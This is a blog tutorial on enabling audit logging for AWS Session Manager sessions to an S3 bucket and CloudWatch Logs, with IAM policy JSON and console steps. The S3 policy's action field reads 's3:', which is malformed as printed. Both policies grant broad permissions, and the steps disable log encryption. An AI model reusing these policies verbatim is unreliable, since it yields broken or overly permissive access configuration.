Configure Logging For Session Manager

In this blog post , We have explained how to configure logging for Session Manager.

In my previous blog posts , I have explained How you can connect to Linux and Windows EC2 instances in a more secure way using Systems Manager’s Session Manager without the need of allowing Inbound rules and SSH keys.

Please check it out below.

Login to Linux EC2 Instances using Session manager

Securely Access Windows EC2 Instances using Session Manager

From the above guide , We have learnt to login securely to Linux and Windows EC2 instances.

Lets setup logging for Sessions Manager So that we can audit it later when required.

In addition to providing information about completed and current sessions , Session manager provides us options for auditing and logging session activity.

Important Note

  • The logs will not be formatted optimally for the Windows Server 2012 or earlier.Hence It is recommended to use Windows Server 2012 R2 or later version.
  • On Amazon Linux , Amazon Linux 2 and Ubuntu servers , the screen utility is installed by default.If the screen utility is not present on the instance the logs will be truncated.

Session Manager Logging Locations

The Session manager logs can be stored in two locations.

  • S3 Bucket
  • Cloudwatch Logs

We will cover both logging strategies in this blog.

Storing Session Manager Logs In S3 Bucket

To store Session manager logs in S3 bucket , First we need to create an S3 bucket.

To create an S3 bucket , Login to S3 console.

Click Create bucket , Enter the name of the bucket and choose the region where S3 bucket should be created.

and click Create

Once the bucket is created , We need the Bucket ARN which we will be using in the Next step.

To get the Bucket ARN , Check the bucket name and then click Copy Bucket ARN

Creating IAM Policy

We need to create an IAM policy and grant the necessary permissions for the Session manager to be able to store the logs in the bucket which we have created.

To create an IAM policy , Login to IAM console.

In the navigation pane , Click Policies and click Create policy

Select JSON , Remove the existing policy and paste the below content.

{
    "Version": "2012-10-17",
    "Statement": [
       {
           "Sid": "VisualEditor1",
           "Effect": "Allow",
           "Action": "s3:",
           "Resource": [
                "arn:aws:s3:::session-manager-audit-logs",
                "arn:aws:s3:::session-manager-audit-logs/*"
           ]
       }
    ]
}

In the resource section , Dont forget to replace the bucket ARN without your own bucket ARN which you have copied in the previous step.

Click Review policy

In the Review policy page , provide a name for the IAM policy with a short description and then click Create policy

Attaching IAM Policy With IAM Role

The next step is to attach the policy which we have created in the previous step to an IAM role.

For this , I am assume that the EC2 Instances that is registered under Systems Manager’s Managed Instance will be already having an IAM role attached with it.

The IAM role already attached with the instance will be having AmazonEC2RoleforSSM policy in it.

So we will add the S3 bucket policy which we created in the previous step to the same IAM role.

To do so , From the IAM console , In the navigation pane , Click Roles

Search for the role that is currently attached with the instance.

Select the role and then Under Permissions

Click Attach policies

Under Attach Permissions , Search for the s3 bucket policy name.

Select it and then click Attach policy

Now When the Session manager session is started for that instance , It will log the output to the S3 bucket which we have mentioned in the IAM policy.

Configure Session Manager Logs To S3 Bucket

Now we will go ahead and enable logging in Session manager.

Login to Systems Manager console , In the navigation pane , Under Instances & Nodes , Choose Session Manager

and then choose Preferences

Click Edit and then Check S3 bucket and then Uncheck Encrypt log data

For S3 bucket name , Choose a bucket name from the list , Select the bucket which we have created before.

and then click Save

Testing Session Manager Logging

To test the logging , We need to start a session for the instance.

From the Systems manager console , In the left navigation pane , Choose Session Manager and then Click Sessions

Click Start session , From the instance lists , Choose the instance that have necessary IAM role attached.

and then click Start session

A browser-based terminal will be opened in the new tab.

You can run bash commands as usual.

Once you are done , Click Terminate

Reviewing The Session Manager Logs

Now the Sessions for the instances should be recorded and logged into S3 bucket.

The Session manager will log only if the active sessions are terminated.

To check all the sessions , Click Session history from the Systems Manager’s Session Manager console.

And you can see the Session is Terminated for the instance and the audit logs are being sent to S3 bucket.

To check the logs , Click the Amazon S3

It will directly take you to the S3 console and displays the log for that particular session.

The log file will start with the IAM username who has established the session and the file extension will be .log.

You can download the log file and review the logs.It will record all the command that you execute on the Session.

We have successfully implemented a logging for the Sessions Manager , Hence going forward If anyone who uses session manager will have their sessions logged to S3 bucket.

Storing Session Manager Logs In Cloudwatch

The process is going to be the same.First we need to create Cloudwatch log group and then create IAM policies with cloudwatch logs permissions and then attach the policy with the IAM role which is already attached with the Instance.

To create Cloudwatch Log group , Login to Cloudwatch console.

In the navigation pane , Under Logs , Click Log groups

Click Create log group , Provide a log group name and then click Create

Creating IAM Policy With Cloudwatch Permissions

To create an IAM policy , Login to IAM console , In the navigation pane , Choose Policies

Click Create policy , Click JSON , Remove the existing policy and add the one attached below.

{
   "Version": "2012-10-17",
   "Statement": [
      {
         "Effect": "Allow",
         "Action": [
             "logs:CreateLogGroup",
             "logs:GetLogEvents",
             "logs:CreateLogStream",
             "logs:PutLogEvents",
             "logs:DescribeLogStreams"
         ],
         "Resource": [
              "arn:aws:logs:::*"
         ]
      }
   ]
}

Click Review policy , Provide name for the IAM policy and then click Create policy

Attaching IAM Policy With IAM Role

The next step is to attach the policy which we have created in the previous step to an IAM role.

For this , I am assume that the EC2 Instances that is registered under Systems Manager’s Managed Instance will be already having an IAM role attached with it.

The IAM role already attached with the instance will be having AmazonEC2RoleforSSM policy in it.

So we will add the Cloudwatch policy which we created in the previous step to the same IAM role.

To do so , From the IAM console , In the navigation pane , Click Roles

Search for the role that is currently attached with the instance.

Select the role and then Under Permissions

Click Attach policies

This image has an empty alt attribute; its file name is Screenshot-from-2020-07-06-17-45-34.png

Under Attach Permissions , Search for the Cloudwatch policy name.

Select it and then click Attach policy

Enable Cloudwatch Logging For Session Manager

Now we will go ahead and enable logging in Session manager.

Login to Systems Manager console , In the navigation pane , Under Instances & Nodes , Choose Session Manager

This image has an empty alt attribute; its file name is Screenshot-from-2020-07-06-18-34-22.png

and then choose Preferences

This image has an empty alt attribute; its file name is Screenshot-from-2020-07-06-18-34-37.png

Click Edit and then Check Cloudwatch logs and then Uncheck Encrypt log data

For Cloudwatch log group , Choose a log group name from the list

Search for the log group name which you have created and then select it and finally click Save.

Testing Session Manager Logging

To test the logging , We need to start a session for the instance.

From the Systems manager console , In the left navigation pane , Choose Session Manager and then Click Sessions

Click Start session , From the instance lists , Choose the instance that have necessary IAM role attached.

and then click Start session

A browser-based terminal will be opened in the new tab.

You can run bash commands as usual.

This image has an empty alt attribute; its file name is Screenshot-from-2020-07-06-18-53-36.png

Once you’re done , Click Terminate

This image has an empty alt attribute; its file name is Screenshot-from-2020-07-06-18-41-22.png

Reviewing Session Manager Logs In Cloudwatch

Now the Sessions for the instances should be recorded and logged into Cloudwatch Log group.

The Session manager will log only if the active sessions are terminated.

To check all the sessions , Click Session history from the Systems Manager’s Session Manager console.

And you can see the Session is Terminated for the instance and the audit logs are being sent to Cloudwatch.

It will directly us you to the Cloudwatch console and displays the log for that particular session.

The log stream will start with the IAM username who has established the session and the log stream will have all the Session manager logs.

From the Cloudwatch console , You can directly audit the logs.

We have implemented logging for Session manager.

Conclusion

For the purpose of audit , We have enable logging for Sessions created by IAM user using Sessions Manager to S3 bucket and Cloudwatch.

Thanks for reading this article.Hope you find it helpful.

Please Check out my other articles.